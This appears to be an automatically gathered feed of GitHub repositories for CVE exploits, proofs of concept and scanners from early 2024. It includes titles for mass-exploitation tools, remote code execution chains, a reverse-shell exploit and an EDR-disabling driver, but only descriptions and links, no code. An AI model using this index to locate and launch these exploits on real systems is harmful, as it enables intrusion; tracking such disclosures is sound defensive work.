**CKEditor 4 < 4.24.0-lts - XSS vulnerability in samples that use the "preview" feature.** : [afine-com/CVE-2024-24816](https://github.com/afine-com/CVE-2024-24816) create time: 2024-02-10T10:26:35Z

**CVE-2024-22024 vulnerability in Ivanti Connect Secure** : [labesterOct/CVE-2024-22024](https://github.com/labesterOct/CVE-2024-22024) create time: 2024-02-10T06:23:44Z

**no description** : [DOCKTYPe19/CVE-2018-9995](https://github.com/DOCKTYPe19/CVE-2018-9995) create time: 2024-02-09T17:17:44Z

**Ivanti Connect Secure & Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. (RCE Exploits)** : [imhunterand/CVE-2024-21887](https://github.com/imhunterand/CVE-2024-21887) create time: 2024-02-09T18:07:06Z

**Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure** : [0dteam/CVE-2024-22024](https://github.com/0dteam/CVE-2024-22024) create time: 2024-02-09T14:31:56Z

**no description** : [arminarab1999/CVE-2018-9995](https://github.com/arminarab1999/CVE-2018-9995) create time: 2024-02-09T12:16:26Z

**no description** : [MendDemo-josh/cve-2022-42889-text4shell](https://github.com/MendDemo-josh/cve-2022-42889-text4shell) create time: 2024-02-08T20:55:09Z

**no description** : [joshbnewton31080/cve-2022-42889-text4shell](https://github.com/joshbnewton31080/cve-2022-42889-text4shell) create time: 2024-02-08T20:54:23Z

**Authenticated Blind SQL Injection. Wordpress woocommerce plugin versions >= 2.5.0** : [DonVorrin/CVE-2021-32789](https://github.com/DonVorrin/CVE-2021-32789) create time: 2024-02-08T19:02:17Z

**Spring Web 5.x with `org.springframework.remoting` package removed, to fix CVE-2016-1000027.** : [yihtserns/spring-web-without-remoting](https://github.com/yihtserns/spring-web-without-remoting) create time: 2024-02-08T15:57:41Z

**CVE-2021-41773, CVE-2021-42013** : [OpenCVEs/CVE-2021-41773](https://github.com/OpenCVEs/CVE-2021-41773) create time: 2024-02-08T15:41:43Z

**PoC to CVE-2023-30547 (Library vm2)** : [user0x1337/CVE-2023-30547](https://github.com/user0x1337/CVE-2023-30547) create time: 2024-02-08T07:03:32Z

**Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.** : [Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability) create time: 2024-02-07T15:07:37Z

**CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol** : [labesterOct/CVE-2024-20931](https://github.com/labesterOct/CVE-2024-20931) create time: 2024-02-07T12:23:05Z

**no description** : [dombisza/cve-2024-21626](https://github.com/dombisza/cve-2024-21626) create time: 2024-02-07T07:38:22Z

**C implementation of Outlook 0-click vulnerability** : [alsaeroth/CVE-2023-23397-POC](https://github.com/alsaeroth/CVE-2023-23397-POC) create time: 2024-02-07T07:08:55Z

**C implementation of libwebp 0-click vulnerability** : [alsaeroth/CVE-2023-4863-POC](https://github.com/alsaeroth/CVE-2023-4863-POC) create time: 2024-02-07T06:58:16Z

**no description** : [rockrid3r/CVE-2023-5178](https://github.com/rockrid3r/CVE-2023-5178) create time: 2024-02-05T15:58:24Z

**no description** : [ilikeoyt/CVE-2023-4450-Attack](https://github.com/ilikeoyt/CVE-2023-4450-Attack) create time: 2024-02-07T03:51:34Z

**no description** : [ELIZEUOPAIN/CVE-2024-24035](https://github.com/ELIZEUOPAIN/CVE-2024-24035) create time: 2024-02-06T18:49:34Z

**no description** : [ELIZEUOPAIN/CVE-2024-24034](https://github.com/ELIZEUOPAIN/CVE-2024-24034) create time: 2024-02-06T16:47:07Z

**no description** : [nitipoom-jar/CVE-2024-24337](https://github.com/nitipoom-jar/CVE-2024-24337) create time: 2024-02-06T16:33:13Z

**CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839** : [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931) create time: 2024-02-06T15:09:33Z

**no description** : [nitipoom-jar/CVE-2024-24336](https://github.com/nitipoom-jar/CVE-2024-24336) create time: 2024-02-06T14:10:02Z

**no description** : [ATonysan/CVE-2024-20931_weblogic](https://github.com/ATonysan/CVE-2024-20931_weblogic) create time: 2024-02-06T09:21:08Z

**一款Spring综合漏洞的利用工具,工具目前支持Spring Cloud Gateway RCE(CVE-2022-22947)、Spring Framework RCE (CVE-2022-22965) 的检测以及利用** : [charonlight/SpringExploitGUI](https://github.com/charonlight/SpringExploitGUI) create time: 2024-02-06T08:45:19Z

**no description** : [Leocodefocus/CVE-2024-20931-Poc](https://github.com/Leocodefocus/CVE-2024-20931-Poc) create time: 2024-02-06T06:35:07Z

**no description** : [tianstcht/CVE-2023-4427](https://github.com/tianstcht/CVE-2023-4427) create time: 2024-02-06T02:29:06Z

**no description** : [JayBeale/cve-202421626](https://github.com/JayBeale/cve-202421626) create time: 2024-02-05T21:05:02Z

**no description** : [V0WKeep3r/CVE-2024-21626-runcPOC](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC) create time: 2024-02-05T17:47:01Z

**Sensitive Information Exposure via API in LearnDash.** : [karlemilnikka/CVE-2024-1208-and-CVE-2024-1210](https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210) create time: 2024-02-05T17:46:41Z

**Sensitive Information Exposure via assignments in LearnDash.** : [karlemilnikka/CVE-2024-1209](https://github.com/karlemilnikka/CVE-2024-1209) create time: 2024-02-05T17:41:47Z

**Nuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)** : [kaanatmacaa/CVE-2024-23897](https://github.com/kaanatmacaa/CVE-2024-23897) create time: 2024-02-04T20:56:42Z

**my sudoedit cve 2021 implmentetion** : [agamabergel/sudoedit](https://github.com/agamabergel/sudoedit) create time: 2024-02-05T11:20:05Z

**no description** : [Verrideo/CVE-2024-23774](https://github.com/Verrideo/CVE-2024-23774) create time: 2024-02-05T10:59:03Z

**no description** : [Verrideo/CVE-2024-23773](https://github.com/Verrideo/CVE-2024-23773) create time: 2024-02-05T10:58:50Z

**no description** : [Verrideo/CVE-2024-23772](https://github.com/Verrideo/CVE-2024-23772) create time: 2024-02-05T10:58:33Z

**CVE-2023-6875 exploit written for Xakep.Ru** : [hatlesswizard/CVE-2023-6875](https://github.com/hatlesswizard/CVE-2023-6875) create time: 2024-02-05T09:44:35Z

**no description** : [trustcves/CVE-2024-24398](https://github.com/trustcves/CVE-2024-24398) create time: 2024-02-05T09:15:17Z

**no description** : [trustcves/CVE-2024-24397](https://github.com/trustcves/CVE-2024-24397) create time: 2024-02-05T09:08:34Z

**no description** : [trustcves/CVE-2024-24396](https://github.com/trustcves/CVE-2024-24396) create time: 2024-02-05T08:43:33Z

**no description** : [xMr110/CVE-2022-1040](https://github.com/xMr110/CVE-2022-1040) create time: 2024-02-05T07:35:41Z

**CVE-2023-47564** : [C411e/CVE-2023-47564](https://github.com/C411e/CVE-2023-47564) create time: 2024-02-04T13:25:58Z

**no description** : [kakaroot1337/-2021-LOCALROOT-CVE-2021-22555](https://github.com/kakaroot1337/-2021-LOCALROOT-CVE-2021-22555) create time: 2024-02-05T07:05:13Z

**no description** : [kakaroot1337/-2022-LOCALROOT-CVE-2022-2639](https://github.com/kakaroot1337/-2022-LOCALROOT-CVE-2022-2639) create time: 2024-02-05T07:10:51Z

**test CVE-2023-29199** : [u-crew/vm2-test](https://github.com/u-crew/vm2-test) create time: 2023-04-19T05:41:38Z

**no description** : [wechicken456/CVE-2021-4034-writeup](https://github.com/wechicken456/CVE-2021-4034-writeup) create time: 2024-02-04T19:00:38Z

**Shellshock exploit (CVE-2014-6271)** : [AlissoftCodes/Shellshock](https://github.com/AlissoftCodes/Shellshock) create time: 2024-02-04T18:19:49Z

**CVE-2019-1332: Reflected Cross-Site Scripting in Microsoft SQL Server Reporting Services** : [mbadanoiu/CVE-2019-1332](https://github.com/mbadanoiu/CVE-2019-1332) create time: 2024-02-04T16:20:49Z

**Exploit for CVE-2019-2215 (bad binder) for Huawei P20 Lite** : [willboka/CVE-2019-2215-HuaweiP20Lite](https://github.com/willboka/CVE-2019-2215-HuaweiP20Lite) create time: 2024-02-04T16:08:02Z

**no description** : [xMr110/CVE-2020-14882](https://github.com/xMr110/CVE-2020-14882) create time: 2024-02-04T09:36:09Z

**no description** : [Shisones/MetabaseRCE_CVE-2023-38646](https://github.com/Shisones/MetabaseRCE_CVE-2023-38646) create time: 2024-01-28T15:01:40Z

**no description** : [hrtowii/CVE-2024-23208-test](https://github.com/hrtowii/CVE-2024-23208-test) create time: 2024-02-04T07:37:21Z

**CVE-2023-32233** : [RogelioPumajulca/TEST-CVE-2023-32233](https://github.com/RogelioPumajulca/TEST-CVE-2023-32233) create time: 2024-02-04T02:24:34Z

**GoAnywhere MFT** : [adminlove520/CVE-2024-0204](https://github.com/adminlove520/CVE-2024-0204) create time: 2024-02-04T01:40:46Z

**no description** : [WLXQqwer/Jenkins-CVE-2024-23897-](https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-) create time: 2024-02-04T01:14:40Z

**Triggering the famous libweb 0day vuln with libfuzzer** : [Microsvuln/CVE-2023-4863](https://github.com/Microsvuln/CVE-2023-4863) create time: 2024-02-03T12:27:37Z

**CVE-2024-21893 to CVE-2024-21887 Exploit Toolkit** : [Chocapikk/CVE-2024-21893-to-CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887) create time: 2024-02-03T11:33:40Z

**no description** : [CharonDefalt/Juniper-exploit-CVE-2023-36845](https://github.com/CharonDefalt/Juniper-exploit-CVE-2023-36845) create time: 2024-02-03T06:09:30Z

**CVE-2024-23897 jenkins arbitrary file read which leads to unauthenticated RCE** : [brijne/CVE-2024-23897-RCE](https://github.com/brijne/CVE-2024-23897-RCE) create time: 2024-02-02T23:13:26Z

**CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure** : [h4x0r-dz/CVE-2024-21893.py](https://github.com/h4x0r-dz/CVE-2024-21893.py) create time: 2024-02-02T22:59:21Z

**no description** : [Trinadh465/external_zlib_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_CVE-2022-37434) create time: 2024-02-02T14:25:28Z

**no description** : [msd0pe-1/CVE-2023-31714](https://github.com/msd0pe-1/CVE-2023-31714) create time: 2023-04-16T20:20:32Z

**Container Runtime Meetup #5 のLT用のデモ** : [laysakura/CVE-2024-21626-demo](https://github.com/laysakura/CVE-2024-21626-demo) create time: 2024-02-02T11:51:08Z

**no description** : [Trinadh465/external_zlib_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_CVE-2022-37434) create time: 2024-02-02T10:28:44Z

**no description** : [cpg-qe/terraform-test-2024-02-02-T-01-02-395-cvesu](https://github.com/cpg-qe/terraform-test-2024-02-02-T-01-02-395-cvesu) create time: 2024-02-02T09:14:06Z

**no description** : [Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434) create time: 2024-02-02T06:57:18Z

**no description** : [zhangguanzhang/CVE-2024-21626](https://github.com/zhangguanzhang/CVE-2024-21626) create time: 2024-02-02T06:34:16Z

**no description** : [yousouf-Tasfin/cve-2017-7921-Mass-Exploit](https://github.com/yousouf-Tasfin/cve-2017-7921-Mass-Exploit) create time: 2024-02-02T03:27:31Z

**CVE-2023-22527 Batch scanning** : [YongYe-Security/CVE-2023-22527](https://github.com/YongYe-Security/CVE-2023-22527) create time: 2024-02-02T04:20:14Z

**CVE-2024-21626-poc-research-Reappearance-andtodo** : [cdxiaodong/CVE-2024-21626](https://github.com/cdxiaodong/CVE-2024-21626) create time: 2024-02-02T03:56:03Z

**no description** : [Wall1e/CVE-2024-21626-POC](https://github.com/Wall1e/CVE-2024-21626-POC) create time: 2024-02-02T02:51:29Z

**no description** : [zpxlz/CVE-2024-21626-POC](https://github.com/zpxlz/CVE-2024-21626-POC) create time: 2024-02-01T12:53:18Z

**The Poc for CVE-2024-20931** : [GlassyAmadeus/CVE-2024-20931](https://github.com/GlassyAmadeus/CVE-2024-20931) create time: 2024-02-02T01:58:49Z

**Comprehensive Exploit Chain for Multiple Vulnerabilities in VinChin Backup & Recovery <= 7.2** : [Chocapikk/CVE-2024-22899-to-22903-ExploitChain](https://github.com/Chocapikk/CVE-2024-22899-to-22903-ExploitChain) create time: 2023-11-06T09:24:15Z

**A vulnerability was found in PHPgurukul visitor management system 1.0. it has been rated as problemic. Affected by the issue is some unknown functionality of the file search bar that called search-visitor.php . The vulnerability is Cross-Site-Scripting (XSS).** : [White-Hat-HackerX/CVE-2024-0652](https://github.com/White-Hat-HackerX/CVE-2024-0652) create time: 2024-02-01T16:27:25Z

**PoC and Detection for CVE-2024-21626** : [NitroCao/CVE-2024-21626](https://github.com/NitroCao/CVE-2024-21626) create time: 2024-02-01T15:28:37Z

**no description** : [Wall1e/CVE-2024-21626-POC](https://github.com/Wall1e/CVE-2024-21626-POC) create time: 2024-02-01T10:59:08Z

**no description** : [mister-turtle/cve-2023-32784](https://github.com/mister-turtle/cve-2023-32784) create time: 2024-02-01T09:41:24Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140) create time: 2024-02-01T07:21:01Z

**CVE-2018-7600 漏洞验证和利用** : [killeveee/CVE-2018-7600](https://github.com/killeveee/CVE-2018-7600) create time: 2024-02-01T05:30:19Z

**no description** : [cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845](https://github.com/cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845) create time: 2024-02-01T03:54:18Z

**PoC for CVE-2024-23897** : [AbraXa5/Jenkins-CVE-2024-23897](https://github.com/AbraXa5/Jenkins-CVE-2024-23897) create time: 2024-02-01T03:17:35Z

**An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.** : [minj-ae/CVE-2024-24488](https://github.com/minj-ae/CVE-2024-24488) create time: 2024-02-01T02:29:19Z

**Es una vulnerabilidad para escalar privilegios en linux.** : [MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation](https://github.com/MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation) create time: 2024-01-31T21:50:04Z

**CVE-2024-0402 Gitlab arbitrary file write/RCE** : [ch4nui/CVE-2024-0402-RCE](https://github.com/ch4nui/CVE-2024-0402-RCE) create time: 2024-01-31T20:14:11Z

**POC about Web3 – Crypto wallet Login & NFT token gating < 3.0.0 - Authentication Bypass Wordpress plugin** : [pctripsesp/CVE-2023-6036](https://github.com/pctripsesp/CVE-2023-6036) create time: 2024-01-31T16:58:48Z

**moxa ioLogik E1212** : [HadessCS/CVE-2023-5961](https://github.com/HadessCS/CVE-2023-5961) create time: 2024-01-31T15:00:16Z

**PoC of CVE-2023-40459 (DoS on ACEmanager)** : [majidmc2/CVE-2023-40459](https://github.com/majidmc2/CVE-2023-40459) create time: 2024-01-31T12:11:34Z

**A write-up detailing CVE-2023-49950. Affects Logpoint SIEM v6.1.0-v7.3.0** : [shrikeinfosec/cve-2023-49950](https://github.com/shrikeinfosec/cve-2023-49950) create time: 2024-01-31T10:18:12Z

**m-y-mo: https://github.com/github/securitylab/tree/main/SecurityExploits/Chrome/v8/CVE-2021-30632** : [paulsery/CVE-2021-30632](https://github.com/paulsery/CVE-2021-30632) create time: 2024-01-31T03:28:58Z

**no description** : [BurakSevben/CVE-2024-24142](https://github.com/BurakSevben/CVE-2024-24142) create time: 2024-01-22T00:36:05Z

**no description** : [BurakSevben/CVE-2024-24141](https://github.com/BurakSevben/CVE-2024-24141) create time: 2024-01-21T23:56:41Z

**no description** : [BurakSevben/CVE-2024-24140](https://github.com/BurakSevben/CVE-2024-24140) create time: 2024-01-21T21:45:34Z

**no description** : [BurakSevben/CVE-2024-24139](https://github.com/BurakSevben/CVE-2024-24139) create time: 2024-01-15T01:48:55Z

**no description** : [BurakSevben/CVE-2024-24138](https://github.com/BurakSevben/CVE-2024-24138) create time: 2024-01-13T21:48:00Z

**no description** : [BurakSevben/CVE-2024-24137](https://github.com/BurakSevben/CVE-2024-24137) create time: 2024-01-13T13:11:35Z

**no description** : [BurakSevben/CVE-2024-24135](https://github.com/BurakSevben/CVE-2024-24135) create time: 2024-01-12T22:49:01Z

**no description** : [BurakSevben/CVE-2024-24136](https://github.com/BurakSevben/CVE-2024-24136) create time: 2024-01-12T21:53:07Z

**no description** : [BurakSevben/CVE-2024-24134](https://github.com/BurakSevben/CVE-2024-24134) create time: 2024-01-12T17:31:15Z

**no description** : [BurakSevben/CVE-2024-22909](https://github.com/BurakSevben/CVE-2024-22909) create time: 2024-01-12T00:40:29Z

**no description** : [BurakSevben/CVE-2024-22890](https://github.com/BurakSevben/CVE-2024-22890) create time: 2024-01-11T22:30:50Z

**Proof-of-concept code for the Android APEX key reuse vulnerability described in https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html** : [metaredteam/rtx-cve-2023-45779](https://github.com/metaredteam/rtx-cve-2023-45779) create time: 2024-01-26T21:17:38Z

**Cookie Information | Free GDPR Consent Solution <= 2.0.22 - Authenticated (Subscriber+) Arbitrary Options Update** : [RandomRobbieBF/CVE-2023-6700](https://github.com/RandomRobbieBF/CVE-2023-6700) create time: 2024-01-30T10:32:54Z

**CVE-2023-51385 的exp** : [2048JiaLi/CVE-2023-51385](https://github.com/2048JiaLi/CVE-2023-51385) create time: 2024-01-30T09:01:05Z

**Bludit** : [CpyRe/I-Find-CVE-2024](https://github.com/CpyRe/I-Find-CVE-2024) create time: 2024-01-30T08:45:47Z

**Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.** : [jahithoque/Juniper-CVE-2023-36845-Mass-Hunting](https://github.com/jahithoque/Juniper-CVE-2023-36845-Mass-Hunting) create time: 2024-01-30T08:00:23Z

**no description** : [kaizensecurity/CVE-2023-37790](https://github.com/kaizensecurity/CVE-2023-37790) create time: 2024-01-30T06:51:37Z

**CVE-2023-41892 Reverse Shell** : [diegaccio/Craft-CMS-Exploit](https://github.com/diegaccio/Craft-CMS-Exploit) create time: 2024-01-29T09:12:59Z

**Simple Automation script for juniper cve-2023-36845** : [Asbawy/Automation-for-Juniper-cve-2023-36845](https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845) create time: 2024-01-29T18:53:22Z

**Microsoft Outlook Information Disclosure Vulnerability (leak password hash)** : [duy-31/CVE-2023-35636](https://github.com/duy-31/CVE-2023-35636) create time: 2024-01-29T17:08:05Z

**10Web AI Assistant – AI content writing assistant <= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description** : [RandomRobbieBF/CVE-2023-6985](https://github.com/RandomRobbieBF/CVE-2023-6985) create time: 2024-01-29T16:51:53Z

**Microsoft Outlook Information Disclosure Vulnerability (leak password hash)** : [duy-31/CVE-2023-35636](https://github.com/duy-31/CVE-2023-35636) create time: 2024-01-29T15:23:37Z

**no description** : [jopraveen/CVE-2024-23897](https://github.com/jopraveen/CVE-2024-23897) create time: 2024-01-29T12:00:25Z

**no description** : [huyqa/cve-2024-23897](https://github.com/huyqa/cve-2024-23897) create time: 2024-01-29T08:50:13Z

**no description** : [cpg-qe/terraform-test-2024-01-29-T-00-01-693-cveeu](https://github.com/cpg-qe/terraform-test-2024-01-29-T-00-01-693-cveeu) create time: 2024-01-29T08:09:59Z

**Jenkins POC of Arbitrary file read vulnerability through the CLI can lead to RCE** : [viszsec/CVE-2024-23897](https://github.com/viszsec/CVE-2024-23897) create time: 2024-01-29T04:41:53Z

**no description** : [l00neyhacker/CVE-2024-24206](https://github.com/l00neyhacker/CVE-2024-24206) create time: 2024-01-29T00:22:54Z

**no description** : [l00neyhacker/CVE-2024-24204](https://github.com/l00neyhacker/CVE-2024-24204) create time: 2024-01-29T00:21:26Z

**no description** : [l00neyhacker/CVE-2024-24203](https://github.com/l00neyhacker/CVE-2024-24203) create time: 2024-01-29T00:20:36Z

**no description** : [l00neyhacker/CVE-2024-22678](https://github.com/l00neyhacker/CVE-2024-22678) create time: 2024-01-29T00:19:48Z

**no description** : [l00neyhacker/CVE-2024-22676](https://github.com/l00neyhacker/CVE-2024-22676) create time: 2024-01-29T00:19:06Z

**no description** : [l00neyhacker/CVE-2024-22675](https://github.com/l00neyhacker/CVE-2024-22675) create time: 2024-01-29T00:17:51Z

**Introduction to CVE-2023-6933 Vulnerability** : [w2xim3/CVE-2023-6933](https://github.com/w2xim3/CVE-2023-6933) create time: 2024-01-28T23:16:53Z

**Samba 3.0.0 - 3.0.25rc3** : [Juantos/cve-2007-2447](https://github.com/Juantos/cve-2007-2447) create time: 2024-01-28T20:51:09Z

**a scenario based on CVE-2022-25845 yielding a TP for metadata based SCA but a FN if the callgraph is used** : [scabench/fastjson-tp1fn1](https://github.com/scabench/fastjson-tp1fn1) create time: 2024-01-28T20:03:23Z

**GitLab CVE-2023-7028** : [hackeremmen/gitlab-exploit](https://github.com/hackeremmen/gitlab-exploit) create time: 2024-01-28T18:23:31Z

**A flaw in Jenkins' CLI command parser allows attackers to inject file paths using the @ character, causing the parser to read and potentially expose sensitive file contents. This vulnerability can be exploited without authentication.** : [raheel0x01/CVE-2024-23897](https://github.com/raheel0x01/CVE-2024-23897) create time: 2024-01-28T12:53:23Z

**no description** : [132231g/CVE-2019-3398](https://github.com/132231g/CVE-2019-3398) create time: 2024-01-28T09:40:35Z

**This repository presents a proof-of-concept of CVE-2024-23897** : [Vozec/CVE-2024-23897](https://github.com/Vozec/CVE-2024-23897) create time: 2024-01-28T01:57:06Z

**CVE-2024-23897 - Jenkins 任意文件读取 利用工具** : [wjlin0/CVE-2024-23897](https://github.com/wjlin0/CVE-2024-23897) create time: 2024-01-27T19:34:48Z

**no description** : [Orange-418/CVE-2024-22514-Remote-Code-Execution](https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution) create time: 2024-01-27T19:04:56Z

**no description** : [Orange-418/CVE-2024-22515-File-Upload-Vulnerability](https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability) create time: 2024-01-27T18:51:26Z

**no description** : [Jaarden/CVE-2024-22894](https://github.com/Jaarden/CVE-2024-22894) create time: 2024-01-27T18:17:48Z

**CVE-2024-22515 arbitrary file upload and CVE-2024-22514 remote code execution for AgentDVR 5.1.6.0 (Authenticated)** : [Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution](https://github.com/Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution) create time: 2024-01-27T15:36:05Z

**Exploit for CVE-2023-6875 - Unauthorized Account Takeover.** : [gbrsh/CVE-2023-6875](https://github.com/gbrsh/CVE-2023-6875) create time: 2024-01-27T14:20:51Z

**no description** : [FancySauce/PwnKit-CVE-2021-4034](https://github.com/FancySauce/PwnKit-CVE-2021-4034) create time: 2024-01-27T13:17:50Z

**on this git you can find all information on the CVE-2024-23897.** : [iota4/PoC-jenkins-rce_CVE-2024-23897.](https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897.) create time: 2024-01-27T13:27:57Z

**CVE-2024-23897 jenkins-cli** : [CKevens/CVE-2024-23897](https://github.com/CKevens/CVE-2024-23897) create time: 2024-01-27T12:57:28Z

**no description** : [gy741/CVE-2023-30258-setup](https://github.com/gy741/CVE-2023-30258-setup) create time: 2024-01-27T06:01:02Z

**Scanner for CVE-2024-23897 - Jenkins** : [yoryio/CVE-2024-23897](https://github.com/yoryio/CVE-2024-23897) create time: 2024-01-27T04:35:20Z

**Scanner for CVE-2024-23897 - Jenkins** : [yoryio/CVE-2024-23897](https://github.com/yoryio/CVE-2024-23897) create time: 2024-01-27T03:38:36Z

**A vulnerable driver exploited by me (BYOVD) that is capable of terminating several EDRs and antivirus software in the market, rendering them ineffective, working for both x32 and x64(CVE-2023-44976).** : [keowu/BadRentdrv2](https://github.com/keowu/BadRentdrv2) create time: 2023-10-01T18:24:38Z

**Proof of Concept for the CVE-2023-47400** : [LucasVanHaaren/CVE-2023-47400](https://github.com/LucasVanHaaren/CVE-2023-47400) create time: 2024-01-26T09:35:47Z

**no description** : [vmtyan/poc-cve-2024-23897](https://github.com/vmtyan/poc-cve-2024-23897) create time: 2024-01-26T21:39:26Z

**CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner.** : [xaitax/CVE-2024-23897](https://github.com/xaitax/CVE-2024-23897) create time: 2024-01-26T19:00:03Z

**Confluence CVE 2021,2022,2023 利用工具,支持命令执行,哥斯拉,冰蝎 内存马注入** : [Lotus6/ConfluenceMemshell](https://github.com/Lotus6/ConfluenceMemshell) create time: 2024-01-26T13:11:21Z

**a simple PDF file for CVE-2018-5158** : [puzzle-tools/-CVE-2018-5158.pdf](https://github.com/puzzle-tools/-CVE-2018-5158.pdf) create time: 2024-01-26T09:19:55Z

**CVE-2024-23897** : [h4x0r-dz/CVE-2024-23897](https://github.com/h4x0r-dz/CVE-2024-23897) create time: 2024-01-26T09:44:32Z

**no description** : [binganao/CVE-2024-23897](https://github.com/binganao/CVE-2024-23897) create time: 2024-01-26T08:02:00Z

**Python Code for Exploit Automation CVE-2023-7028** : [mochammadrafi/CVE-2023-7028](https://github.com/mochammadrafi/CVE-2023-7028) create time: 2024-01-26T06:29:34Z

**Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability** : [louiselalanne/CVE-2024-23747](https://github.com/louiselalanne/CVE-2024-23747) create time: 2024-01-26T00:43:29Z

**Miro Desktop 0.8.18 on macOS allows Electron code injection.** : [louiselalanne/CVE-2024-23746](https://github.com/louiselalanne/CVE-2024-23746) create time: 2024-01-26T00:39:20Z

**Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2019-12840 la qual te da un RCE en root** : [Pol-Ruiz/PoC-CVE-2019-12840](https://github.com/Pol-Ruiz/PoC-CVE-2019-12840) create time: 2024-01-25T23:07:28Z

**no description** : [whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC](https://github.com/whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC) create time: 2024-01-25T22:11:57Z

**In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack.** : [louiselalanne/CVE-2024-23745](https://github.com/louiselalanne/CVE-2024-23745) create time: 2024-01-25T21:20:40Z

**no description** : [austino2000/CVE-2024-22534](https://github.com/austino2000/CVE-2024-22534) create time: 2024-01-25T18:57:34Z

**no description** : [thanhlam-attt/CVE-2023-22527](https://github.com/thanhlam-attt/CVE-2023-22527) create time: 2024-01-22T19:02:59Z

**WP Subscription Forms <= 1.2.1 - Email Verification Bypass** : [0x9567b/CVE-2024-0846](https://github.com/0x9567b/CVE-2024-0846) create time: 2024-01-25T15:29:25Z

**Path traversal in the popup-more WordPress plugin** : [0x9567b/CVE-2024-0844](https://github.com/0x9567b/CVE-2024-0844) create time: 2023-12-31T15:36:51Z

**CVE-2023-46805 POC RCE** : [w2xim3/CVE-2023-46805](https://github.com/w2xim3/CVE-2023-46805) create time: 2024-01-25T14:53:16Z

**CVE-2024-23742** : [V3x0r/CVE-2024-23742](https://github.com/V3x0r/CVE-2024-23742) create time: 2024-01-25T13:52:05Z

**CVE-2024-23741** : [V3x0r/CVE-2024-23741](https://github.com/V3x0r/CVE-2024-23741) create time: 2024-01-25T13:49:10Z

**CVE-2024-23739** : [V3x0r/CVE-2024-23739](https://github.com/V3x0r/CVE-2024-23739) create time: 2024-01-25T13:44:16Z

**CVE-2024-23739** : [V3x0r/CVE-2024-23740](https://github.com/V3x0r/CVE-2024-23740) create time: 2024-01-25T13:37:08Z

**CVE-2024-23738** : [V3x0r/CVE-2024-23738](https://github.com/V3x0r/CVE-2024-23738) create time: 2024-01-25T13:27:19Z

**no description** : [V3x0r/CVE-2024-23743](https://github.com/V3x0r/CVE-2024-23743) create time: 2023-12-19T17:07:27Z

**CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC** : [adminlove520/CVE-2023-22527](https://github.com/adminlove520/CVE-2023-22527) create time: 2024-01-25T10:52:39Z

**Atlassian Confluence Remote Code Execution(RCE) Proof Of Concept** : [MaanVader/CVE-2023-22527-POC](https://github.com/MaanVader/CVE-2023-22527-POC) create time: 2024-01-25T05:32:06Z

**Because of a hardcoded login credential in the code, an attacker can log in to the web application on whether they enter the wrong credential or not.** : [keru6k/CVE-2024-22922](https://github.com/keru6k/CVE-2024-22922) create time: 2024-01-25T11:14:43Z

**no description** : [shenhav12/CVE-2024-22889-Plone-v6.0.9](https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9) create time: 2024-01-25T10:26:29Z

**Repository to install CVE-2023-7028 vulnerable Gitlab instance** : [Trackflaw/CVE-2023-7028-Docker](https://github.com/Trackflaw/CVE-2023-7028-Docker) create time: 2024-01-25T09:56:00Z

**An SQL injection Vulnerability in projectworlds' Visitor Management System** : [keru6k/CVE-2024-22983](https://github.com/keru6k/CVE-2024-22983) create time: 2024-01-25T10:05:00Z

**CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE POC** : [forsaken0127/CVE-2024-23897](https://github.com/forsaken0127/CVE-2024-23897) create time: 2024-01-25T08:37:31Z

**Proof of concept for the vulnerability CVE-2018-19410** : [himash/CVE-2018-19410-POC](https://github.com/himash/CVE-2018-19410-POC) create time: 2024-01-25T07:20:19Z

